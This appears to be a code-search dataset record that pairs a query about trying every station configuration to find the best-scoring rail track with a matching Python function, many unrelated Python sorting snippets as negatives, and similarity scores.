cmp(x.sortKey(), y.sortKey()))\r\n\t\t\tself._playerScores.reverse()\r\n\t\tmaxPlayers = ScoreOpt.getMaxPlayers()\r\n\t\tif maxPlayers > 0 and len(self._playerScores) > maxPlayers:\r\n\t\t\tself._playerScores = self._playerScores[len(self._playerScores) - maxPlayers:]", "def topo_sort(self):\n # TODO: detect cycles\n self.find_reachable_nodes()\n # save list of nodes in topo order\n self.nodes = []\n # assign each node an id field incrementally\n cur_id = 0\n # count visited outgoing edges for each node\n unvisited = {}\n for nid, node in list(self.found.items()):\n unvisited[nid] = node.nout\n queue = [self.root]\n #print >>sys.stderr, '+++'\n while queue:\n # take off nodes whose all outgoing edges are visited from\n # queue head\n node = queue.pop(0)\n self.nodes.append(node)\n node.hg = self\n node.id = cur_id\n cur_id += 1\n for edge in node.incoming:\n edge.hg = self\n for tailnode in edge.tail:\n #print >>sys.stderr, tailnode\n unvisited[id(tailnode)] -= 1\n if unvisited[id(tailnode)] == 0:\n queue.append(tailnode)\n self.sanity_check()\n self.tasks_done.add('topo_sort')", "def _sort_nodes_by_height(self):\n self.node_high_to_low = np.argsort(self.height)[::-1]\n\n # Also to sort neighbour node array by height\n\n neighbour_array_lo_hi = self.neighbour_array.copy() # easiest way to get size / structure right\n\n for node in range(0,self.tri.npoints):\n heights = self.height[self.neighbour_array[node]]\n neighbour_array_lo_hi[node] = self.neighbour_array[node][np.argsort(heights)]\n \n self.neighbour_array_lo_hi = neighbour_array_lo_hi", "def sort(self):\r\n\t\treturn sorted(self.sample)", "def sortByValue(d):\r\n items=d.items()\r\n backitems=[ [v[1],v[0]] for v in items]\r\n backitems.sort(); backitems.reverse()\r\n return [ backitems[i][1] for i in range(0,len(backitems))]", "def sort_nodes_by_n_reachable(graph):\n list_of_node_and_reachables_tups = [] # stores the number of reachable nodes per node\n # The following for loop finds the number of reachable nodes per node\n for node_to_test in graph.nodes:\n n_reachable = 0\n # The following for loop checks each node if it is reachable from node_to_test. If so, adds to the counter\n for node_is_reachable in graph.nodes:\n if graph.is_reachable(node_to_test, node_is_reachable) and node_to_test != node_is_reachable:\n n_reachable += 1\n # Adds a tuple with the node_to_test and the counter of reachable nodes\n list_of_node_and_reachables_tups.append((node_to_test, n_reachable))\n # At this point we have a list with tuples including the node name and its reachables. Now need to sort them\n sorted_nodes_by_reachable = sorted(list_of_node_and_reachables_tups, key=lambda tup: tup[1], reverse=True)\n return sorted_nodes_by_reachable", "def sort_series(a, n):\n\t# This uses the above function to calculate the order by which the dictionary should be ordered\n\t# Any ties are then sorted by the first element in the lists\n\n\treturn sorted(a, key=lambda x: (series_score(x,n),x[1][0]))\n\n\t# Below, to test the function out the dictionary is printed with it's values, then without the values and just\n\t# as a string to make it easier to read and check.", "def sort_max_h2h_odds(self):\n\n\t\tfor i,event in enumerate(self.teams):\n\t\t\t# for each event\n\n\t\t\t# init list of 2 dictonarys (1 for each team) that contains the max odds and the site for those odds\n\t\t\tself.max_h2h_odds.append({self.teams[i][0] : [0, \"no site\"], self.teams[i][1] : [0, \"no site\"]})\n\n\t\t\tfor j,team in enumerate(self.teams[i]):\n\t\t\t\t# for each team\n\t\t\t\tfor k,site_odds in enumerate(self.h2h_odds[i]):\n\t\t\t\t\t# for all odds find largest and save\n\t\t\t\t\tif site_odds[j] > self.max_h2h_odds[i][team][0]:\n\t\t\t\t\t\tself.max_h2h_odds[i][team] = [site_odds[j] , self.betting_sites[i][k]]\n\t\t\n\t\tprint('Finished finding max odds')", "def dmc_order(self):\n return sorted(self.lookup_table, key=lambda clr: int(clr.id) if clr.id.isdigit() else 0)", "def sort_neighbors_by_site_index_i(neighbor_count_df: pd.DataFrame) -> pd.DataFrame:\n return neighbor_count_df.sort_values(by=[\"i\", \"distance_bin\", \"j\"]).reset_index(\n drop=True\n )", "def sort(self):\r\n self.candidates.sort(key=self.sortFitness)\r\n return", "def asc(self):\n self.get_output = sorted((value, key) for (key, value) in self.get_output.items())", "def init_sorted_variables(self):\n variables_by_neighbors = [] # A list of (var_name, |neighbors|)\n for variable in self.var_names:\n variables_by_neighbors.append(\n (self.variables[variable].get_name(), len(self.variables[variable].get_neighbors())))\n\n # In this part we sort the variables according to the heuristic:\n variables_by_neighbors = sorted(variables_by_neighbors, key=lambda tup: tup[1], reverse=True)\n # (J) Notice that there can be many variables with same neighbour, thus the order between them isn't determined.\n self.sorted_variables = [*map(lambda x: x[0], variables_by_neighbors)]", "def get_top_10_dict():\n top_10_raw = session.execute(\"SELECT * FROM yolo_top_10\")\n\n top_10_sorted = []\n for row in top_10_raw:\n try:\n map_url = ladder_maps[row[0]]\n except KeyError:\n map_url = (\"https://s3-us-west-1.amazonaws.com/guang-stargazer/\"\n \"ladder_maps/cat.jpg\")\n top_10_sorted.append((row[0], row[1], map_url))\n top_10_sorted.sort(key=lambda tup: tup[1], reverse=True)\n\n top_10_dict = {}\n for position, row in enumerate(top_10_sorted):\n top_10_dict[\"num\" + str(position)] = {\"map_name\": row[0],\n \"match_count\": row[1],\n \"map_url\": row[2]}\n return top_10_dict", "def stations(self):\n for stat in sorted(self.station_records):\n yield self.station_records[stat]", "def _sort_membind_info(membind_bind_info):\n membind_cpu_list = []\n nodes_count = int(max(element[2] for element in membind_bind_info)) + 1\n # Sort list by Node id\n for node_number in range(nodes_count):\n node_core_list = []\n core_info = {}\n for entry in membind_bind_info:\n cpu_id = int(entry[0])\n core_id = int(entry[1])\n node_id = int(entry[2])\n # On a machine where there is no NUMA nodes, entry[3] could be empty, so set socket_id = -1\n if entry[3] != \"\":\n socket_id = int(entry[3])\n else:\n socket_id = -1\n\n # Skip nodes other than current node number\n if node_number != node_id:\n continue\n\n # Add core info\n if cpu_id == core_id:\n core_info.update({\n core_id: {\n \"cpu_id\": cpu_id,\n \"node_id\": node_id,\n \"socket_id\": socket_id,\n },\n })\n else:\n # Add information about Hyper Threading\n core_info[core_id][\"ht_cpu_id\"] = cpu_id\n\n # Change dict of dicts to list of dicts\n for iterator in range(len(core_info)):\n curr_core_id = len(core_info) * node_number + iterator\n single_core_info = core_info.get(curr_core_id)\n if single_core_info:\n node_core_list.append(single_core_info)\n\n membind_cpu_list.append(node_core_list)\n\n return membind_cpu_list", "def station_analysis(data):\n unique_stations = list(set(data['start_station_name'].tolist() + data['end_station_name'].tolist()))\n\n station_counter = {station : 0 for station in unique_stations}\n for index, row in data.iterrows():\n station_counter[row['start_station_name']] += 1\n\n print('List of all stations:')\n print(unique_stations)\n\n keys = list(station_counter.keys())\n vals = list(station_counter.values())\n indexArr = np.argsort(list(station_counter.values()))\n popularStations = []\n for i in reversed(indexArr):\n popularStations.append((keys[i], vals[i]))\n\n stations1, journeys = zip(*popularStations[0:10])\n plt.bar(stations1, journeys, 0.1)\n\n plt.xticks(stations1, rotation='vertical')\n plt.title('Popular stations')\n plt.xlabel('Station names')\n plt.ylabel('Journeys')\n\n plt.show()\n return station_counter", "def sort_key(self):\n ...", "def print_sorted_table_by_value(table):\n\td_view = [ (v,k) for k,v in table.iteritems() ]\n\td_view.sort(reverse=True) # natively sort tuples by first element\n\tfor v,k in d_view:\n\t\tprint \"%d: %s\" % (v,k)", "def test_list_ipsec_site_connection_sort(self):\r\n resources = \"ipsec_site_connections\"\r\n cmd = ipsec_site_connection.ListIPsecSiteConnection(\r\n test_cli20.MyApp(sys.stdout), None\r\n )\r\n self._test_list_resources(resources, cmd,\r\n sort_key=[\"name\", \"id\"],\r\n sort_dir=[\"asc\", \"desc\"])", "def brute_force_cow_transport(cows,limit=10):\n # TODO: Your code here\n #print(list(cows.items()))\n cows_list=list(cows.items())\n curr_list=[[[0]]]\n for i in range(1,len(cows_list)):\n smaller_fun(curr_list,i,limit,cows_list)\n\n ans =sorted(curr_list,key=lambda x:len(x))\n print(ans)\n ansfinal=[]\n for item in ans:\n trip=[]\n for i in range(len(item)):\n trip.append(cows_list[item[i]][0])\n ansfinal.append(trip)\n return ansfinal", "def _sort_segments_by_weight(self, l_segments):\n if len(l_segments) < 2:\n return l_segments\n\n l_segments_weights = sorted(\n [(i, self._calc_weight_of_segment(t_segment[0])) for i, t_segment in enumerate(l_segments)],\n key=lambda x: x[1], reverse=True)\n\n l_segments_sorted = [l_segments[i] for i, _ in l_segments_weights]\n return l_segments_sorted", "def categorize_data(data, top_count):\n sorted_by_tcp = sorted(\n data, key=lambda x: x['TCP Utilization'], reverse=True\n )[0:top_count]\n sorted_by_udp = sorted(\n data, key=lambda x: x['UDP Utilization'], reverse=True\n )[0:top_count]\n\n print(f\"\\nTOP-{top_count} port flooders by TCP\")\n print(tabulate(sorted_by_tcp, headers='keys', tablefmt=\"psql\"))\n print(f\"\\nTOP-{top_count} port flooders by UDP\")\n print(tabulate(sorted_by_udp, headers='keys', tablefmt=\"psql\"))", "def toposorted(infos):\n key_to_info = {}\n depends = {}\n for info in infos:\n key_to_info[info.key] = info\n depends[info.key] = []\n for info in infos:\n for after in info.after:\n after_info = key_to_info[after]\n depends[info.key].append(after_info)\n for before in info.before:\n before_info = key_to_info[before]\n depends[before_info.key].append(info)\n return topological_sort(infos, lambda info: depends[info.key])", "def test_topological_sort(self) -> None:\n\n # tuple convention: (outgoing, incoming)\n graph = {\n \"1\": ([\"4\"], []),\n \"2\": ([\"4\"], []),\n \"3\": ([\"5\", \"6\"], []),\n \"4\": ([\"7\", \"5\"], [\"1\", \"2\"]),\n \"5\": ([\"8\"], [\"4\", \"3\"]),\n \"6\": ([], [\"3\"]),\n \"7\": ([\"8\"], [\"4\"]),\n \"8\": ([], [\"7\", \"5\"])\n } # type: Dict[str, Tuple[List[str], List[str]]]\n\n self.assertEqual(topological_sort(graph, [\"1\", \"2\", \"3\"]), [\"1\", \"2\", \"3\", \"4\", \"6\", \"7\", \"5\", \"8\"])", "def test_topological_sort(self) -> None:\n\n # tuple convention: (outgoing, incoming)\n graph = {\n \"1\": ([\"4\"], []),\n \"2\": ([\"4\"], []),\n \"3\": ([\"5\", \"6\"], []),\n \"4\": ([\"7\", \"5\"], [\"1\", \"2\"]),\n \"5\": ([\"8\"], [\"4\", \"3\"]),\n \"6\": ([], [\"3\"]),\n \"7\": ([\"8\"], [\"4\"]),\n \"8\": ([], [\"7\", \"5\"])\n } # type: Dict[str, Tuple[List[str], List[str]]]\n\n self.assertEqual(topological_sort(graph, [\"1\", \"2\", \"3\"]), [\"1\", \"2\", \"3\", \"4\", \"6\", \"7\", \"5\", \"8\"])", "def sort(self, value_key=None, ascending=True):\r\n\t\tsorted_indexes = MultiPointData.sort(self, value_key=value_key, ascending=ascending)\r\n\t\tself.sdr = np.array(self.sdr)[sorted_indexes]\r\n\t\treturn sorted_indexes", "def _device_sort_key(iface):\n dev = (iface.get(\"device\") or \"\").lower()\n if dev.startswith(\"eth\") or dev.startswith(\"en\"):\n return \"0\" + dev\n if dev.startswith(\"wl\"):\n return \"1\" + dev\n if dev.startswith(\"e\") or dev.startswith(\"w\"):\n return \"2\" + dev\n else:\n return dev", "def orderings(self, function_graph):\r\n return OrderedDict()", "def _sort_measurements(self):\n if self._unsorted:\n sorted_ndxs = np.argsort(self._angles)\n self._distances = self._distances[sorted_ndxs]\n self._angles = self._angles[sorted_ndxs]\n self._intensities = self._intensities[sorted_ndxs]\n self._error_codes = self._error_codes[sorted_ndxs]\n self._unsorted = False", "def keys_sorted_by_value(d):\n # By Daniel Schult, 2004/01/23\n # http://aspn.activestate.com/ASPN/Python/Cookbook/Recipe/52306\n items=d.items()\n backitems=[ [v[1],v[0]] for v in items]\n backitems.sort()\n return [ backitems[i][1] for i in range(0,len(backitems))]", "def _sort_phot(self, verbose=False):\n if hasattr(self, \"data\") and hasattr(self, \"data_filters\"):\n ## This looks fugly.\n newkeys = np.array([i for i in self.data_filters.keys()])[np.argsort([self.data_filters[i].lambda_effective.value for i in self.data_filters])]\n\n sorted_data = OrderedDict()\n sorted_data_filters = OrderedDict()\n\n for newkey in newkeys:\n\n if verbose: print(newkey)\n\n sorted_data[newkey] = self.data[newkey]\n sorted_data_filters[newkey] = self.data_filters[newkey]\n\n self.data = sorted_data\n self.data_filters = sorted_data_filters\n\n else:\n warnings.warn(\"Doesn't seem to be any data here (empty self.data)\")\n pass", "def sort_weight(self):\n self._elements = list(\n _[-1] for _ in sorted((e.weight, e.value, e) for e in self)\n )", "def sort_facility(self):\n self.entries.sort(key=lambda x: x.severity)\n self.entries.sort(key=lambda x: x.facility)", "def _sort_ds(self):\n d = []\n for layer in self.structure:\n if (layer.type == 'Layer' or layer.type == 'Substrate'):\n d.append(layer.thickness)\n d.insert(0, self.structure[0].thickness)\n d.append(self.structure[-1].thickness)\n d = np.asarray(d)\n return d", "def sortVersion(ver_map):\n\tfor key in list(ver_map.keys()):\n\t\tver_map[key].sort( key=lambda x: x[1], reverse=True)", "def group_packets(self, packets):\n sessions = packets.sessions() # groups connections from X to Y as a Scapy PacketList in a dict\n # example: dict['TCP 172.217.17.102:443 > 10.7.2.60:38386'] = PacketList\n\n session_keys = list(sessions.keys()) # force copy so we can alter the dictionary at runtime\n for key in session_keys:\n reversed_key = self.reverse_dict_key(key)\n if(reversed_key != key and sessions.__contains__(reversed_key)):\n sessions[key] += sessions.pop(reversed_key)\n session_keys.remove(reversed_key)\n\n return self.sort_grouped_packets(list(sessions.values()))", "def sort(self):\n # Sort here actually uses the tuple comparison we defined in the Card class\n self.cards.sort()", "def sortPopulation(self):\n self.population = sorted(self.population, key=attrgetter('fitness'), reverse=True)", "def sort(self):\n self.cards.sort()", "def sort(self):\n self.cards.sort()", "def collect(duthosts, tbinfo):\n duts_map = tbinfo['duts_map']\n res = defaultdict(dict)\n for dut in duthosts:\n dut_indx = duts_map[dut.hostname]\n dut_hostname = dut.hostname\n res[dut_hostname]['devices_interconnect_interfaces'] = get_interconnected_links(tbinfo, dut_indx)\n res[dut_hostname]['vm_links'] = get_vm_links(tbinfo, dut_indx)\n host_interfaces = tbinfo['topo']['ptf_map'][str(dut_indx)]\n res[dut_hostname]['vm_link_on_ptf'] = host_interfaces[res[dut_hostname]['vm_links'][0]]\n _ = [host_interfaces.pop(vm) for vm in res[dut_hostname]['vm_links'] if vm in list(host_interfaces.keys())]\n res[dut_hostname]['host_interfaces'] = natsorted(host_interfaces)\n res[dut_hostname]['ptf_map'] = host_interfaces\n res[dut_hostname]['all_links'] = natsorted(res[dut_hostname]['host_interfaces'] +\n res[dut_hostname]['devices_interconnect_interfaces'] +\n res[dut_hostname]['vm_links'])\n res[dut_hostname]['mclag_interfaces'] = natsorted(\n [PC_NAME_TEMPLATE.format(indx + 1)\n for indx, _ in enumerate(res[dut_hostname]['host_interfaces'][:-2])])\n return res", "def sort_ranking_dict(self):\n\n # reset self.ranking_dict to empty dict (if sorted tuple)\n self.ranking_dict = {}\n\n # create ranking dict with player and grand total score\n for j, player in enumerate(self._players_list):\n ranking_name, ranking_score = \\\n self._players_list[j].get_name_and_grand_total_score()\n self.ranking_dict[ranking_name] = ranking_score\n\n # reverse sort ranking dict by grand total (returns list)\n self.ranking_dict = sorted(self.ranking_dict.items(),\n key=lambda x: x[1], reverse=True)", "def sorting(self, presorted=None):\n self._sorted_nodes = []\n if presorted:\n notsorted_nodes = copy(presorted)\n else:\n notsorted_nodes = copy(self.nodes)\n predecessors = {key: copy(val) for (key, val) in self.predecessors.items()}\n\n # nodes that depends only on the self._nodes_wip should go first\n # soe remove them from the connections\n for nd_out in self._node_wip:\n for nd_in in self.successors[nd_out.name]:\n predecessors[nd_in.name].remove(nd_out)\n\n while notsorted_nodes:\n sorted_part, notsorted_nodes = self._sorting(notsorted_nodes, predecessors)\n self._sorted_nodes += sorted_part\n for nd_out in sorted_part:\n for nd_in in self.successors[nd_out.name]:\n predecessors[nd_in.name].remove(nd_out)", "def update_link_statistics(self):\n for link in self.links.values():\n link.update_link_statistics()\n if self.track:\n key = self.id + \":\" + globals.PACKETLOSS\n globals.statistics[key][globals.systime] = self.droppedpackets\n self.droppedpackets = 0", "def natsort_icase(lst):\n lst.sort(key=natsort_key_icase)", "def order_domain_values(self, var, assignment):\n # retrieve the domain for the variable\n domain = self.domains[var]\n # initialise a dictionary for sorting the values in the variable's domain\n sorting_dict = {} \n # for each of the values in the variable's domain \n for value in domain:\n # set the constraint counter to zero\n sorting_dict[value] = 0\n # for each of the neighbors of the variable\n for neighbor in self.crossword.neighbors(var):\n # retrieve the overlap indexes\n overlap = self.crossword.overlaps[(neighbor, var)]\n # for each of the overlap's possible values (the overlap's domain)\n for test in self.domains[neighbor]:\n # if the overlap letter is not the same\n if test[overlap[0]] != value[overlap[1]]:\n # this value constrains the neighbor's domain\n sorting_dict[value] += 1\n # sort the dictionary by the value of the sorting key\n sorted_vars = sorted(domain, key=lambda x: sorting_dict[x])\n return sorted_vars", "def sort_duration(self):\n self.sort('duration')", "def sort_data(data):\n sorted_data = {}\n for datum in data:\n for key in datum:\n collection = sorted_data.get(key, [])\n collection.append(int(datum[key]))\n sorted_data[key] = collection\n return sorted_data", "def get_maps(sort_index):\n conn = connect()\n cur = conn.cursor()\n cur.execute(\"SELECT * from maps\")\n maps = cur.fetchall()\n cur.close()\n conn.close()\n print \"number of maps fetched: \" + str(len(maps))\n return sorted(maps, key=lambda k: k[sort_index])" ]
[ "0.6438473", "0.6063636", "0.5954494", "0.5753256", "0.572934", "0.5722744", "0.55783653", "0.54763424", "0.5446469", "0.54192704", "0.5373764", "0.531757", "0.5296655", "0.5287621", "0.5285237", "0.5215991", "0.52076167", "0.52006", "0.5183816", "0.51670825", "0.51528376", "0.5143027", "0.5131351", "0.51195717", "0.51148933", "0.5101579", "0.51013666", "0.5089672", "0.5086954", "0.5074658", "0.5043467", "0.5041102", "0.5040515", "0.50367016", "0.5008699", "0.50045955", "0.5003179", "0.4996999", "0.49931997", "0.49930784", "0.49912342", "0.4970673", "0.4960229", "0.49588868", "0.49407667", "0.4934521", "0.49339467", "0.493055", "0.49213305", "0.49184853", "0.49155405", "0.49119186", "0.49101314", "0.4908905", "0.48954204", "0.4892789", "0.48880208", "0.48860583", "0.48843065", "0.487561", "0.4874506", "0.48725066", "0.4871554", "0.4871512", "0.48707503", "0.48693636", "0.48644957", "0.4856643", "0.4856393", "0.48444605", "0.48358583", "0.48328793", "0.48207933", "0.48202148", "0.48166797", "0.48166797", "0.4816507", "0.48129734", "0.4812118", "0.48082063", "0.48050842", "0.48029253", "0.4802547", "0.47999492", "0.47972572", "0.47858545", "0.47748122", "0.47482523", "0.47428018", "0.4722396", "0.4722396", "0.47186175", "0.47178936", "0.47082448", "0.47055352", "0.47036886", "0.46985942", "0.46964854", "0.46944624", "0.46915525" ]
0.6300883
1
Tries all possible configurations starting at the first station and only adds the configuration with the best score.
def visit_all_possibilities(self, first_station, track, grid): # loops over connections of station for connection in first_station.connections: # keeps adding untill the max length of a track is reached if track.add_station(grid, self.stations[connection].name): # calculates the quality of adding the station and remembers it if it is the best score yet if grid.get_quality() > self.best_score: self.best_score = grid.get_quality() self.grid = copy.deepcopy(grid) print(f"new best score: {self.best_score}:\n{self.grid}\n\n") # repeat untill there are no more configurations left self.visit_all_possibilities(self.stations[connection], track, grid) track.remove_last_station()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pick_next_station(self, station):\n self.best_score = 0\n\n stations = self.grid.stations\n # all connections of the last added added station \n lookahead_1 = self.grid.get_station(self.best_connection[1]).connections\n\n for la1 in lookahead_1.values():\n next_station = la1[0].name\n # if adding the connection exceeds the tracks max time length \n if self.track.add_station(self.grid, next_station) is False:\n break\n\n lookahead_2 = self.grid.get_station(la1[0].name).connections\n\n # keeps adding stations untill the time limit is reached\n for la2 in lookahead_2:\n la2 = stations.get(la2)\n if self.track.add_station(self.grid, la2.name) is False:\n break\n \n quality = self.grid.get_quality()\n \n self.track.remove_last_station()\n\n # if quality improves, add first station to the track\n if quality > self.best_score:\n self.best_score = quality \n self.best_connection = [la2.name, la1[0].name]\n \n self.track.remove_last_station()", "def get_bests(self):\n set_names = [\"training\", \"hp_selection\", \"validation\"]\n run_tec_conf_set = recursivedict()\n validation = self._campaign_configuration['General']['validation']\n hp_selection = self._campaign_configuration['General']['hp_selection']\n if (validation, hp_selection) in {(\"All\", \"All\"), (\"Extrapolation\", \"All\"), (\"All\", \"HoldOut\"), (\"HoldOut\", \"All\"), (\"HoldOut\", \"HoldOut\"), (\"Extrapolation\", \"HoldOut\")}:\n # For each run, for each technique the best configuration\n run_tec_best_conf = recursivedict()\n\n # Hyperparameter search\n for conf in self._exp_confs:\n run = int(conf.get_signature()[0].replace(\"run_\", \"\"))\n technique = conf.technique\n run_tec_conf_set[run][technique][str(conf.get_signature()[4:])] = conf.mapes\n # First experiment for this technique or better than the current best\n if technique not in run_tec_best_conf[run] or conf.mapes[\"hp_selection\"] < run_tec_best_conf[run][technique].mapes[\"hp_selection\"]:\n run_tec_best_conf[run][technique] = conf\n\n # Print results for each run\n for run in range(0, self._campaign_configuration['General']['run_num']):\n self._logger.info(\"-->Printing results for run %s\", str(run))\n overall_run_best = None\n # Print data of single techniques\n for technique in run_tec_best_conf[run]:\n temp = run_tec_best_conf[run][technique]\n self._logger.info(\"---Best result for %s - Configuration is %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", technique, temp.get_signature()[4:], temp.mapes[\"training\"], temp.mapes[\"hp_selection\"], temp.mapes[\"validation\"])\n\n # Compute which is the best technique\n if not overall_run_best or temp.mapes[\"hp_selection\"] < overall_run_best.mapes[\"hp_selection\"]:\n overall_run_best = temp\n best_model_description = overall_run_best.print_model()\n self._logger.info(\"<--Overall best result is %s %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", overall_run_best.get_signature()[3:], \"(\" + best_model_description + \")\" if best_model_description else \"\", overall_run_best.mapes[\"training\"], overall_run_best.mapes[\"hp_selection\"], overall_run_best.mapes[\"validation\"])\n\n elif (validation, hp_selection) in {(\"KFold\", \"All\"), (\"KFold\", \"HoldOut\")}:\n folds = float(self._campaign_configuration['General']['folds'])\n # For each run, for each fold, for each technique, the best configuration\n run_fold_tec_best_conf = recursivedict()\n\n # Hyperparameter search inside each fold\n for conf in self._exp_confs:\n run = int(conf.get_signature()[0].replace(\"run_\", \"\"))\n fold = int(conf.get_signature()[1].replace(\"f\", \"\"))\n technique = conf.technique\n if \"hp_selection\" not in run_tec_conf_set[run][technique][str(conf.get_signature_string()[4:])]:\n for set_name in set_names:\n run_tec_conf_set[run][technique][str(conf.get_signature_string()[4:])][set_name] = 0\n for set_name in set_names:\n run_tec_conf_set[run][technique][str(conf.get_signature_string()[4:])][set_name] = run_tec_conf_set[run][technique][str(conf.get_signature_string()[4:])][set_name] + conf.mapes[set_name] / folds\n # First experiment for this fold+technique or better than the current best\n if technique not in run_fold_tec_best_conf[run][fold] or conf.mapes[\"hp_selection\"] < run_fold_tec_best_conf[run][fold][technique].mapes[\"hp_selection\"]:\n run_fold_tec_best_conf[run][fold][technique] = conf\n\n # Aggregate different folds (only the value of the mapes)\n run_tec_set = recursivedict()\n for run in run_fold_tec_best_conf:\n for fold in run_fold_tec_best_conf[run]:\n for tec in run_fold_tec_best_conf[run][fold]:\n if \"hp_selection\" not in run_tec_set[run][technique]:\n for set_name in set_names:\n run_tec_set[run][tec][set_name] = 0\n for set_name in set_names:\n run_tec_set[run][tec][set_name] = run_fold_tec_best_conf[run][fold][tec].mapes[set_name]\n # Print results for each run\n for run in range(0, self._campaign_configuration['General']['run_num']):\n self._logger.info(\"Printing results for run %s\", str(run))\n overall_run_best = ()\n # Print data of single techniques\n for technique in run_tec_set[run]:\n self._logger.info(\"---Best result for %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", technique, run_tec_set[run][technique][\"training\"], run_tec_set[run][technique][\"hp_selection\"], run_tec_set[run][technique][\"validation\"])\n\n # Compute which is the best technique\n if not overall_run_best or run_tec_set[run][technique][\"hp_selection\"] < overall_run_best[1][\"hp_selection\"]:\n overall_run_best = (technique, run_tec_set[run][technique])\n\n self._logger.info(\"---Overall best result is %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", overall_run_best[0], overall_run_best[1][\"training\"], overall_run_best[1][\"hp_selection\"], overall_run_best[1][\"validation\"])\n\n # Overall best will contain as first argument the technique with the best (across runs) average (across folds) mape on validation; now we consider on all the runs and on all the folds the configuraiton of this technique with best validation mape\n\n elif (validation, hp_selection) in {(\"All\", \"KFold\"), (\"HoldOut\", \"KFold\"), (\"Extrapolation\", \"KFold\")}:\n folds = float(self._campaign_configuration['General']['folds'])\n # For each run, for each technique, for each configuration, the aggregated mape\n run_tec_conf_set = recursivedict()\n\n # Hyperparameter search aggregating over folders\n for conf in self._exp_confs:\n run = int(conf.get_signature()[0].replace(\"run_\", \"\"))\n fold = int(conf.get_signature()[2].replace(\"f\", \"\"))\n technique = conf.technique\n configuration = str(conf.get_signature()[4:])\n if \"hp_selection\" not in run_tec_conf_set[run][technique][configuration]:\n for set_name in set_names:\n run_tec_conf_set[run][technique][configuration][set_name] = 0\n for set_name in set_names:\n run_tec_conf_set[run][technique][configuration][set_name] = run_tec_conf_set[run][technique][configuration][set_name] + conf.mapes[set_name] / folds\n\n # Select the best configuration for each technique across different folders\n run_tec_best_conf = recursivedict()\n for run in run_tec_conf_set:\n for tec in run_tec_conf_set[run]:\n for conf in run_tec_conf_set[run][tec]:\n if tec not in run_tec_best_conf[run] or run_tec_conf_set[run][tec][conf][\"hp_selection\"] < run_tec_best_conf[run][tec][1][\"hp_selection\"]:\n run_tec_best_conf[run][tec] = (conf, run_tec_conf_set[run][tec][conf])\n\n # Print results for each run\n for run in range(0, self._campaign_configuration['General']['run_num']):\n self._logger.info(\"Printing results for run %s\", run)\n overall_run_best = () # (technique, configuration, mapes)\n # Print data of single techniques\n for technique in run_tec_best_conf[run]:\n temp = run_tec_best_conf[run][technique]\n self._logger.info(\"---Best result for %s - Configuration is %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", technique, temp[0], temp[1][\"training\"], temp[1][\"hp_selection\"], temp[1][\"validation\"])\n\n # Compute which is the best technique\n if not overall_run_best or temp[1][\"hp_selection\"] < overall_run_best[2][\"hp_selection\"]:\n overall_run_best = (technique, temp[0], temp[1])\n\n self._logger.info(\"---Overall best result is %s %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", overall_run_best[0], overall_run_best[1], overall_run_best[2][\"training\"], overall_run_best[2][\"hp_selection\"], overall_run_best[2][\"validation\"])\n\n elif (validation, hp_selection) in {(\"KFold\", \"KFold\")}:\n folds = float(self._campaign_configuration['General']['folds'])\n # For each run, for each external fold, for each technique, the aggregated mape\n run_efold_tec_conf_set = recursivedict()\n\n # Hyperparameter search aggregating over internal folders\n for conf in self._exp_confs:\n run = int(conf.get_signature()[0].replace(\"run_\", \"\"))\n ext_fold = int(conf.get_signature()[2].replace(\"f\", \"\"))\n technique = conf.technique\n configuration = str(conf.get_signature()[4:])\n if \"hp_selection\" not in run_tec_conf_set[run][technique][configuration]:\n for set_name in set_names:\n run_tec_conf_set[run][technique][configuration][set_name] = 0\n for set_name in set_names:\n run_tec_conf_set[run][technique][configuration][set_name] = run_tec_conf_set[run][technique][configuration][set_name] + (conf.mapes[set_name] / (folds * folds))\n if configuration not in run_efold_tec_conf_set[run][ext_fold][technique]:\n for set_name in set_names:\n run_efold_tec_conf_set[run][ext_fold][technique][configuration][set_name] = 0\n for set_name in set_names:\n run_efold_tec_conf_set[run][ext_fold][technique][configuration][set_name] = run_efold_tec_conf_set[run][ext_fold][technique][configuration][set_name] + (conf.mapes[set_name] / (folds * folds))\n\n # Select the best configuration for each technique in each external fold across different internal folders\n run_efold_tec_best_conf = recursivedict()\n for run in run_efold_tec_conf_set:\n for efold in run_efold_tec_conf_set[run]:\n for tec in run_efold_tec_conf_set[run][efold]:\n for conf in run_efold_tec_conf_set[run][efold][tec]:\n if conf not in run_efold_tec_best_conf[run][efold][tec] or run_efold_tec_conf_set[run][efold][tec][conf][\"hp_selection\"] < run_efold_tec_best_conf[run][efold][tec][1][\"hp_selection\"]:\n run_efold_tec_best_conf[run][efold][tec] = (conf, run_efold_tec_conf_set[run][efold][tec][conf], run_efold_tec_conf_set[run][efold][tec][conf])\n\n # Aggregate on external folds\n run_tec_set = recursivedict()\n for run in run_efold_tec_best_conf:\n for efold in run_efold_tec_best_conf[run]:\n for tec in run_efold_tec_best_conf[run][efold]:\n if \"hp_selection\" not in run_tec_set[run][tec]:\n for set_name in set_names:\n run_tec_set[run][tec][set_name] = 0\n for set_name in set_names:\n run_tec_set[run][tec][set_name] = run_tec_set[run][tec][set_name] + run_efold_tec_best_conf[run][efold][tec][1][set_name]\n\n # Print results for each run\n for run in range(0, self._campaign_configuration['General']['run_num']):\n self._logger.info(\"Printing results for run %s\", run)\n overall_run_best = ()\n # Print data of single techniques\n for technique in run_tec_set[run]:\n self._logger.info(\"---Best result for %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", technique, run_tec_set[run][technique][\"training\"], run_tec_set[run][technique][\"hp_selection\"], run_tec_set[run][technique][\"validation\"])\n\n # Compute which is the best technique\n if not overall_run_best or run_tec_set[run][technique][\"hp_selection\"] < overall_run_best[1][\"hp_selection\"]:\n overall_run_best = (technique, run_tec_set[run][technique])\n\n self._logger.info(\"---Overall best result is %s - (Training MAPE is %f - HP Selection MAPE is %f) - Validation MAPE is %f\", overall_run_best[0], overall_run_best[1][\"training\"], overall_run_best[1][\"hp_selection\"], overall_run_best[1][\"validation\"])\n\n else:\n self._logger.error(\"Unexpected combination: %s\", str((validation, hp_selection)))\n sys.exit(1)\n best_confs = {}\n best_technique = None\n for conf 